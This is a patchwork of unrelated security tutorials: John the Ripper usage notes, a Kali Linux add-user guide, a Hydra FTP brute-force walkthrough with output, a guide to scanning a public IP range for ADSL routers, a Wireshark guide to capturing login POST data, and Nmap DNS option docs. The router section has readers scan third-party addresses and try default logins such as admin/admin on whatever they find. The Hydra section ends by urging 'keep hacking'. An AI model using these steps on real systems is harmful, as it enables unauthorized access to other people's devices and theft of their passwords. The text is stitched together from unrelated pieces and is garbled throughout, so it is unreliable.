If you�re going to be cracking Kerberos AFS passwords, use John�s �unafs� utility to obtain a passwd-like file.
Similarly, if you�re going to be cracking Windows passwords, use any of the many utilities that dump Windows password hashes (LM and/or NTLM) in Jeremy Allison�s PWDUMP output format. Some of these utilities may be obtained here:

 http://www.openwall.com/passwords/pwdump

2. Now, let�s assume you�ve got a password file, �mypasswd�, and want to crack it. The simplest way is to let John use its default order of cracking modes:

 john mypasswd

This will try �single crack� mode first, then use a wordlist with rules, and finally go for �incremental� mode. Please refer to MODES for more information on these modes.
It is highly recommended that you obtain a larger wordlist than John�s default password.lst and edit the �Wordlist = �� line in the configuration file (see CONFIG) before running John. Some wordlists may be obtained here:

 http://www.openwall.com/wordlists/

Of those available in the collection at the URL above, all.lst (downloadable as all.gz) and huge.lst (only available on the CD) are good candidates for the �Wordlist = �� setting.
3. If you�ve got some passwords cracked, they are stored in $JOHN/john.pot. The john.pot file is not meant to be human-friendly. You should be using John itself to display the contents of its �pot file� in a convenient format:

 john --show mypasswd

If the account list gets large and doesn�t fit on the screen, you should, of course, use your shell�s output redirection.
You might notice that many accounts have a disabled shell. You can make John skip those in the report. Assuming that the disabled shell is called �/etc/expired�, the command would be:

 john --show --shells=-/etc/expired mypasswd

or shorter, but will also match �/any/path/expired�:

 john --show --shells=-expired mypasswd

or if you also want to ignore some other shell, say �/etc/newuser�:

 john --show --shells=-expired,newuser mypasswd

To check if any root (UID 0) accounts got cracked:

 john --show --users=0 mypasswd

or to check for cracked root (UID 0) accounts in multiple files:

 john --show --users=0 *passwd* *.pwd

To display the root (username �root�) account only:

 john --show --users=root mypasswd

And finally, to check for privileged groups:

 john --show --groups=0,1 mypasswd

4. You might prefer to manage the cracking modes manually. It is wise to start with �single crack� mode:

 john --single mypasswd

or since the GNU-style double dashes are optional and since option names can be abbreviated for as long as they remain unambiguous:

 john -si mypasswd

You should not abbreviate options in scripts which you would want to work with future versions of John since what is unambiguous now might become ambiguous with the addition of more options.
If you have more files to crack, it is preferable to load them at the same time:

 john --single passwd1 passwd2

or even:

 john --single *passwd* *.pwd

This way, John will run faster and might even crack more passwords than it would if you ran it on each password file separately.
5. To catch weak passwords not derived from readily available users� personal information, you should proceed with cracking modes demanding more processor time. First, let�s try a tiny wordlist with word mangling rules enabled:

 john --wordlist=password.lst --rules mypasswd

or abbreviating the options:

 john -w=password.lst -ru mypasswd

Then proceed with a larger wordlist, also applying the mangling rules:

 john --wordlist=all.lst --rules mypasswd

If you�ve got a lot of spare disk space to trade for performance and the hash type of your password files is relatively slow, you may use John�s �unique� utility to eliminate any duplicate candidate passwords:

 john --wordlist=all.lst --rules --stdout | unique mangled.lst
 john --wordlist=mangled.lst mypasswd

If you know that your target hash type truncates passwords at a given length, you may optimize this even further:

 john --wordlist=all.lst --rules --stdout=8 | unique mangled8.lst
 john --wordlist=mangled8.lst mypasswd

Alternatively, you may simply use huge.lst available on Openwall wordlist collection CDs. It has word mangling rules pre-applied for the most common languages and it has any duplicates purged.
Depending on target hash type, the number of different salts (if applicable), the size of your wordlist, rules, and processor performance, wordlist-based cracking may take anywhere from under a second to many days.
You do not have to leave John running on a (pseudo-)terminal. If running John on a Unix-like system, you can simply disconnect from the server, close your xterm, etc. John will catch the SIGHUP (�hangup� signal) and continue running. Alternatively, you may prefer to start it in the background right away:

 john --wordlist=all.lst --rules mypasswd &

Obviously, the �&� is specific to Unix shells and will not work on most other platforms.
You may further enhance this by specifying a session name:

 john --session=allrules --wordlist=all.lst --rules mypasswd &

This ensures that you won�t accidentally interfere with the instance of John running in the background if you proceed to start other sessions.
To view the status of a running session, use:

 john --status

for the default session or:

 john --status=allrules

for any other session. This works for both interrupted and running sessions. To obtain the most up-to-date information from a running session on a Unix-like system, send a SIGHUP to the appropriate �john� process.
Any interrupted sessions may be continued with:

 john --restore

or:

 john --restore=allrules

Finally, to make John have less impact on other processes, you should set the option �Idle = Y� in the configuration file (see CONFIG). The default may vary depending on the version and build of JtR.
To only crack accounts with a �good� shell (in general, the shell, user, and group filters described above work for all cracking modes as well):

 john --wordlist=all.lst --rules --shells=sh,csh,tcsh,bash mypasswd

Like with all other cracking modes, it is faster to crack all the files you need cracked simultaneously:

 john --wordlist=all.lst --rules passwd1 passwd2

You can crack some passwords only. This will try cracking all root (UID 0) accounts in all the password files:

 john --wordlist=all.lst --rules --users=0 *passwd*

Alternatively, you may wish to not waste time cracking your very own passwords, if you�re sure they�re uncrackable:

 john --wordlist=all.lst --rules --users=-root,solar *passwd*

Sometimes it is useful to split your password hashes into two sets which you crack separately, like:

 john --wordlist=all.lst --rules --salts=2 *passwd*
 john --wordlist=all.lst --rules --salts=-2 *passwd*

This will make John try salts used on two or more password hashes first and then try the rest. Total cracking time will be almost the same, but you will get some passwords cracked earlier, which is useful, for example, for penetration testing and demonstrations to management. Similarly, you may check all password hashes with a small wordlist, but only those that you can check faster (with ��salts=2�) with a larger one. With large numbers of password hashes and/or with a highly non-uniform distribution of salts, it may be appropriate to use a threshold larger than 2 with ��salts� (sometimes even values as high as 1000 will do).
Note that the default wordlist rules include �:� (a no-op � try words as they are in the list) on the first line. If you already ran through a wordlist without using rules, and then decided to also try the same wordlist with rules, you�d better comment this line out.
6. The most powerful cracking mode in John is called �incremental� (not a proper name, but kept for historical reasons). You can simply run:

 john --incremental mypasswd

or:

 john -i mypasswd

This will use the default �incremental� mode parameters, which are defined in the configuration file�s section named either [Incremental:ASCII] (for most hash types) or [Incremental:LM_ASCII] (for Windows LM hashes). By default, the [Incremental:ASCII] parameters are set to use the full printable ASCII character set (95 characters) and to try all possible password lengths from 0 to 13 (if the current hash type has a lower maximum password length, incremental mode�s length limit is reduced accordingly). [Incremental:LM_ASCII] is similar, except that it takes advantage of LM hashes being case-insensitive and of their halves being limited to 7 characters each.
Don�t expect �incremental� mode sessions to terminate in a reasonable time (unless all the passwords are weak and get cracked), read MODES for an explanation of this.
In some cases it is faster to use some other pre-defined incremental mode parameters and only crack simpler passwords, from a limited character set. The following command will try 10 different characters only, passwords from �0� to �99999999999999999999� (in an optimal order):

 john -i=digits mypasswd

Of course, you can use most of the additional features demonstrated above for wordlist mode with �incremental� mode as well. For example, on a large-scale penetration test, you may have John crack only root (UID 0) accounts in a set of password files:

 john -i -u=0 *.pwd

7. If you�ve got a password file for which you already have a lot of passwords cracked or obtained by other means, and the passwords are unusual, then you may want to generate a new charset file, based on character frequencies from that password file only:

 john --make-charset=custom.chr mypasswd

Then use that new file with �incremental� mode.
If you�ve got many password files from a particular country, organization, etc., it might be useful to use all of them for the charset file that you then use to crack even more passwords from these files or from some other password files from the same place:

 john --make-charset=custom.chr passwd1 passwd2
 [ Configure your custom "incremental" mode now. See below. ]
 john -i=custom passwd3

You can use some pre-defined or custom word filters when generating the charset file to have John consider some simpler passwords only:

 john --make-charset=my_alpha.chr --external=filter_alpha mypasswd

If your �pot file� got large enough (or if you don�t have any charset files at all), you might want to use it to generate a new set of main charset files:

 makechr

where �makechr� is a script that invokes �john �make-charset=�� with varying filenames, for all of the external mode word filters defined in the configuration file. In this example, John will overwrite the charset files with new ones that are based on your entire $JOHN/john.pot (John uses the entire �pot file� if you don�t specify any password files).
8. Finally, you might want to e-mail all users with weak passwords to tell them to change their passwords. (This is not always a good idea, though, since lots of people do not check their e-mail or ignore such messages, and the messages can be a hint for crackers.) Edit the �mailer� script supplied with John: the message it sends and possibly the mail command (especially if the password file is from a different machine). Then run:

 mailer mypasswd

Configuration file.

Please refer to CONFIG for general information on the configuration file and its possible locations.
1. Let�s assume that you notice that in some password file a lot of users have their passwords set to login names with �?!� appended. Then you just make a new �single crack� mode rule (seeRULES for information on the syntax) and place it somewhere near the beginning:

 [List.Rules:Single]
 Az"?!"

Hint: if you want to temporarily disable all of the default rules, you can simply rename the section to something John doesn�t use and define a new one with the section�s old name, but be sure to leave the �List.� prefix of the name intact to maintain correct configuration file syntax.
All the same applies to wordlist mode rules as well.
2. If you generate a custom charset file (described above) you will also need to define a configuration file section with the �incremental� mode parameters. In the simplest case it will be like this (where �Custom� can be replaced with any name you like):

 [Incremental:Custom]
 File = custom.chr

This way, John will only use characters from passwords used to generate the charset file only. To make John try some more characters, add:

 Extra = !@#$%

These extra characters will then be added, but still considered the least probable. If you want to make sure that, with your extra characters, John will try 95 different characters, you can add:

 CharCount = 95

This will make John print a warning if it only has fewer than 95 characters in its charset.
You can also use CharCount to limit the number of different characters that John tries, even if the charset file has more:

 CharCount = 20

If you didn�t use any filters when generating the charset file, setting CharCount this low will make John never attempt rare characters and character combinations, not even for really short passwords, spending the time on simple longer candidate passwords instead. However, the default length switching is usually smart enough so that you shouldn�t need this trick.
To make John try passwords of certain lengths only, use the following lines:

 MinLen = 6
 MaxLen = 8

Setting �MinLen� high, as in the example above, is reasonable if shorter passwords weren�t allowed to set on the machine you got the password file from (however, note that root can usually set any password for any user and there are often loopholes in operating systems� password policy enforcement capabilities).
On the contrary, you may want to set �MaxLen� low if you think there are a lot of short passwords.
3. Another example: a lot of users at some site use short duplicated words as their passwords, such as �fredfred�. As the number of such potential passwords is fairly low, it makes sense to code a new external cracking mode that tries them all, up to some length.
You can find the actual implementation of such a cracking mode with lots of comments in the default configuration file supplied with John. Please refer to EXTERNAL for information on the programming language used.

How to add remove user (standard user/non-root) in Kali Linux

This guide will walk you through on how to add remove user (standard user or non-root user) in Kali Linux. I�ve tested this in Kali Linux, so any Debian or Debian derivative (such as Ubuntu) should just work.

This guide accomplishes:

The main reason I wanted to try this to demonstrate the followings:

1. Add a user with all user directories already in place (thereby avoiding �Could not update .ICEauthority var/lib/gdm3/.ICEauthority� or any error containing .ICEauthority or permission in general.
2. Add user to sudo group to allow him to use root commands. You can also add user to �lpadmin� group to allow printing for Canon or HP and such.

1. Change default shell from chsh to bash. Or any shell like Bourne Shell (sh), Bourne-Again Shell (bash), C Shell (csh) or Korn shell (ksh) etc.
2. Login as that user and demonstrate there were no errors.
3. Be able to use sudo and show groups affinity.
4. Delete that user safely.

Benefits of Standard User in Kali:

Few benefits you have as non-root or standard user in Kali

1. Install and run Google Chrome
2. Install and run Gnome User and Groups manager (Install gnome-system-tools)
3. Use Kali as Primary Operating System without worrying about breaking it all the time.

Now let�s move onto actual guide.

Add user in Kali Linux:

• First of all let�s confirm which version of Linux and Kernel I�m running.In command prompt type in

  uname �a
  lsb_release �a

  

• Now let�s add user. Open terminal and type following to create new user (replace user1 with your desired user name)

  useradd -m user1

  
  (Note: -m means create home directory which is usually /home/username)

• Now set password for this user

  passwd user1

  Enter desired password twice
  

• Add user to sudo group (to allow user to install software, allow printing, use privileged mode etc.)

  usermod -a -G sudo user1

  
  (Note: -a means append or add and �G mean to specified group/groups)

• Change default shell of previously created user to bash

  chsh -s /bin/bash user1

  
  (Note: chsh mean change login shell, -s is the name of the specified shell you want for the user, in this case /bin/bash)
  Nice, all worked out as expected.
  Let�s logout and login back as our new Standard Non-root user (user1)

Crack passwords in Kali Linux with Hydra

For years, experts have warned about the risks of relying on weak passwords to restrict access to data, and this is still a problem. A rule of thumb for passwords is the longer, the better. In this guide I will use FTP as a target service and will show how to crack passwords in Kali Linux with Hydra.
There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallelized connects. We�ve previously covered password cracking using John the Ripper, Wireshark,NMAP and MiTM.

Hydra can be used and compiled cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.
Currently THC Hydra tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Supported Platforms

1. All UNIX platforms (linux, *bsd, solaris, etc.)
2. Mac OS/X
3. Windows with Cygwin (both IPv4 and IPv6)
4. Mobile systems based on Linux, Mac OS/X or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.
For brute forcing Hydra needs a list of passwords. There are lots of password lists available out there. In this example we are going to use the default password list provided with John the Ripper which is another password cracking tool. Other password lists are available online, simply Google it.
The password list s pre-installed on Kali Linux and its password list can be found at the following location

/usr/share/john/password.lst

It looks like this

#!comment: This list has been compiled by Solar Designer of Openwall Project,
#!comment: http://www.openwall.com/wordlists/
#!comment:
#!comment: This list is based on passwords most commonly seen on a set of Unix
#!comment: systems in mid-1990's, sorted for decreasing number of occurrences
#!comment: (that is, more common passwords are listed first).  It has been
#!comment: revised to also include common website passwords from public lists
#!comment: of "top N passwords" from major community website compromises that
#!comment: occurred in 2006 through 2010.
#!comment:
#!comment: Last update: 2011/11/20 (3546 entries)
123456
12345
password
password1
123456789
12345678
1234567890

Create a copy of that file to your desktop or any location and remove the comment lines (all the lines above the password 123456). Now our word list of passwords is ready and we are going to use this to brute force an ftp server to try to crack its password.
Here is the simple command with output

root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-05-13 04:32:18
[DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "123456" - 1 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "12345" - 2 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "password" - 3 of 3546 [child 0]
[21][ftp] host: 192.168.1.1   login: admin   password: password
[STATUS] attack finished for 192.168.1.1 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-05-13 04:32:33
root@kali:~#

Check the line �[21][ftp]�. It mentions the username/password combination that worked for the ftp server. Quite easy!
Now lets take a look at the options. The t option tells how many parallel threads Hydra should create. In this case I used 1 because many routers cannot handle multiple connections and would freeze or hang for a short while. To avoid this its better to do 1 attempt at a time. The next option is �l� which tells the username or login to use. In this case its admin. Next comes the capital �P� option which provides the word list to use. Hydra will pickup each line as a single password and use it.
The �v� option is for verbose and the capital �V� option is for showing every password being tried. Last comes the host/IP address followed by the service to crack.

THC hydra help menu - click to expand

Brute forcing is the most basic form of password cracking techniques. In works well with devices like routers etc which are mostly configured with their default passwords. However when it comes to other systems, brute forcing will not work unless you are too lucky.
However still brute forcing is a good practice for hackers so you should keep trying all techniques to hack a system. So keep hacking!!

Additional tools bundled with THC Hydra

pw-inspector

It reads passwords in and prints those which meets the requirements

pw-inspector help menu - click to expand

Resources

Source: http://www.thc.org/thc-hydra/

Router Hack � How to hack ADSL router using NMAP

Asynchronous digital subscriber line (DSL or ADSL) modem is a device used to connect a computer or router to a telephone line which provides the digital subscriber line service for connectivity to the Internet, which is often called DSL or ADSL broadband. In this guide I will show you show you how to scan IP range for connected ADSL or DSL modem routers and find DSL ADSL router hack remotely. This guide applies to Windows, Linux or Mac, so it doesn�t matter what�s your Operating system is, you can try the same steps from all these operating systems. The term DSL or ADSL modem is technically used to describe a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot. The more common DSL or ADSL router which combines the function of a DSL or ADSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a residential gateway, a DSL or ADSL router usually manages the connection and sharing of the DSL or ADSL service in a home or small office network.
Put this together with Wireshark hacking for http websites, you got a nightmare for the user behind that router as all their passwords and details can be tracked very easily.

What's in a DSL ADSL Router? - Click to expand

Installing NMAP

I use Kali Linux which comes with NMAP Preinstalled. If you are using Windows or Mac (or any other flavour of Linux) go to the following website to download and install NMAP.

Linux Installation:

For Ubuntu, Debian or aptitude based system NMAP is usually made available via default repository. Install NMAP using the following command:

sudo apt-get install nmap

For YUM Based systems such as Redhat, CentOS, install via

sudo yum install nmap

For PACMAN based systems such as Arch Linux, install via

sudo pacman -S nmap

Windows Installation:

For Windows Computers, download installer and run the executable. Link: http://nmap.org/dist/nmap-6.46-setup.exe

Mac Installation:

For Mac users, download installer and install Link: http://nmap.org/dist/nmap-6.46.dmg

Official NMAP site

You can read more about NMAP here: http://nmap.org/

Search for Vulnerable Routers

Now that we have NMAP sorted, we are going to run the following command to scan for ADSL Modem Routers based on their Banner on Port 80 to start our ADSL router hack. All you need is to pick an IP range. I�ve used an example below using 101.53.64.1/24 range.

Search from Linux using command Line

In Linux run the following command:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - | grep 'open' | grep    

-v 'tcpwrapped'

In Windows or Mac open NMAP and copy paste this line:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -

Once it finds the results, search for the word �open� to narrow down results. A typical Linux NMAP command would return outputs line below: (and of course I�ve changed the IP details)

Host: 101.53.64.3 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 ()  Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.9 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.31 () Ports: 80/open/tcp//http?///
Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.35 () Ports: 80/open/tcp//http?///
Host: 101.53.64.37 () Ports: 80/open/tcp//http?///
Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.52 () Ports: 80/open/tcp//http?///
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.58 () Ports: 80/open/tcp//http?///
Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/
Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.107 ()        Ports: 80/open/tcp//http?///
Host: 101.53.64.112 ()        Ports: 80/open/tcp//http?///
Host: 101.53.64.115 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.123 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.129 ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.135 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.145 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.149 ()        Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: 101.53.64.167 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.170 ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.186 ()        Ports: 80/open/tcp//http?///
Host: 101.53.64.188 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.193 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.202 ()        Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: 101.53.64.214 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.224 ()        Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/

This was taking a long time (we are after all try to scan 256 hosts using the command above). Me being just impatient, I wanted to check if my Kali Linux was actually doing anything to ADSL router hack. I used the following command in a separate Terminal to monitor what my PC was doing� it was doing a lot �

tcpdump -ni eth0

That�s a lot of connected hosts with TCP Port 80 open. Some got �tcpwrapped� marked on them. It means they are possibly not accessible.

Search from Windows, Mac or Linux using GUI � NMAP or Zenmap

Assuming you got NMAP installation sorted, you can now open NMAP (In Kali Linux or similar Linux distro, you can use Zenmap which is GUI version of NAMP cross platform). Copy paste the following line in Command field

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG -

another version of this command is using different representation of Subnet MASK.

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -

Press SCAN Button and wait few minutes till the scan is over.

Once you have some results, then you need to find the open devices with open ports. In search Result page:

1. Click on Services Button
2. Click on http Service
3. Click on Ports/Hosts TAB (Twice to sort them by status)

As you can see, I�ve found a few devices with open http port 80.

It is quite amazing how many devices got ports open facing outer DMZ.

Access Management Webpage

Pick one at a time. For example try this:

http://101.53.64.3

http://101.53.64.4

http://101.53.64.129

You get the idea. If it opens a webpage asking for username and password, try one of the following combinations:

admin/admin
admin/password
admin/pass
admin/secret

If you can find the Router�s model number and make, you can find exact username and password from this webpage: http://portforward.com/default_username_password/ Before we finish up, I am sure you were already impatient like me as a lot of the routers had �tcpwrapped� on them which was actually stopping us from accessing the web management interface to ADSL router hack. Following command will exclude those devices from our search. I�ve also expanded my search to a broader range using a slightly different Subnet MASK.

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In this command I am using /22 Subnet Mask with 2 specific outputs: I am looking for the work �open� and excluding �tcpwrapped� on my output. As you can see, I still get a lot of outputs.

Website Password hacking using WireShark

ets try this on a simple website. I will hide part of the website name (just for the fact that they are nice people and I respect their privacy.). For the sake of this guide, I will just show everything done on a single machine. As for you, try it between two VirtualBox/VMWare/Physical machines.
p.s. Note that some routers doesn�t broadcast traffic, so it might fail for those particular ones.

Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to
Application > Kali Linux > Top 10 Security Tools > Wireshark
In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a Wireless USB card, so I�ve selected wlan0.

Ideally you could just press Start button here and Wireshark will start capturing traffic. In case you missed this, you can always capture traffic by going back to Capture > Interface > Start

Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing them. I opened a browser and signed in a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.
Usually you see a lot of data in Wireshark. However are are only interested on POST data.

Why POST only?

Because when you type in your username, password and press the Login button, it generates a a POST method (in short � you�re sending data to the remote server).
To filter all traffic and locate POST data, type in the following in the filter section
http.request.method == �POST�
See screenshot below. It is showing 1 POST event.

Nmap: DNS (part-19)

Force Reverse DNS Resolution
The -R parameter instructs Nmap to always perform reverse DNS resolution on the target IP address.
Usage syntax: nmap -R [target]

# nmap -R 64.13.134.52
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 17:22 Central
Daylight Time
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 993 filtered ports
PORT STATE
25/tcp closed smtp
SERVICE
53/tcp open
70/tcp closed gopher
80/tcp open
110/tcp closed pop3
113/tcp closed auth
domain
http
31337/tcp closed Elite
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

Output of a Nmap scan with reverse DNS enabled
By default, Nmap will only do reverse DNS for hosts that appear to be online. The -R option is useful when performing reconnaissance on a block of IP addresses as Nmap will try to resolve the reverse DNS information of every IP address. The reverse DNS information can reveal interesting information about the target IP address (even if it is offline or blocking Nmap�s probes).
Note The -R option can dramatically reduce the performance of a scan.



Disable Reverse DNS Resolution
The -n parameter is used to disable reverse DNS lookups.
Usage syntax: nmap -n [target]

# nmap -n 64.13.134.52
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 17:23 Central
Daylight Time
Interesting ports on 64.13.134.52:
Not shown: 993 filtered ports
PORT STATE
SERVICE
25/tcp closed smtp
53/tcp open
70/tcp closed gopher
80/tcp open
110/tcp closed pop3
113/tcp closed auth
domain
http
31337/tcp closed Elite
Nmap done: 1 IP address (1 host up) scanned in 8.48 seconds

Output of a Nmap scan with reverse DNS disabled
Reverse DNS dramatically can significantly slow an Nmap scan. Using the -n option
greatly reduces scanning times - especially when scanning a large number of hosts.
This option is useful if you don�t care about the DNS information for the target
system and prefer to perform a scan which produces faster results.




Alternative DNS Lookup Method
The --system-dns option instructs Nmap to use the host system�s DNS resolver
instead of its own internal method.
Usage syntax: nmap --system-dns [target]

$ nmap --system-dns scanme.insecure.org
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-09 21:47 CDT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 972 closed ports, 26 filtered ports
PORT
STATE SERVICE
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 19.86 second

Output of a Nmap scan using the system DNS resolver



This option is rarely used as it is much slower than the default method. It can,
however, be useful when troubleshooting DNS problems with Nmap.

Note
The system resolver is always used for IPv6 scans as Nmap has not yet fully implemented its own internal IPv6 resolver.


Manually Specify DNS Server(s)
The --dns-servers option is used to manually specify DNS servers to be queried
when scanning.

Usage syntax: nmap --dns-servers [server1,server2,etc] [target]
$ nmap --dns-servers 208.67.222.222,208.67.220.220 scanme.insecure.org
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-09 22:40 CDT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 998 closed ports
PORT
STATE SERVICE
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 32.07 seconds

Manually specifying DNS servers


Nmap�s default behavior will use the DNS servers configured on your local system
for name resolution. The --dns-servers option allows you to specify one or more
alternative servers for Nmap to query. This can be useful for systems that do not
have DNS configured or if you want to prevent your scan lookups from appearing in
your locally configured DNS server�s log file.
Note This option is currently not available for IPv6 scans.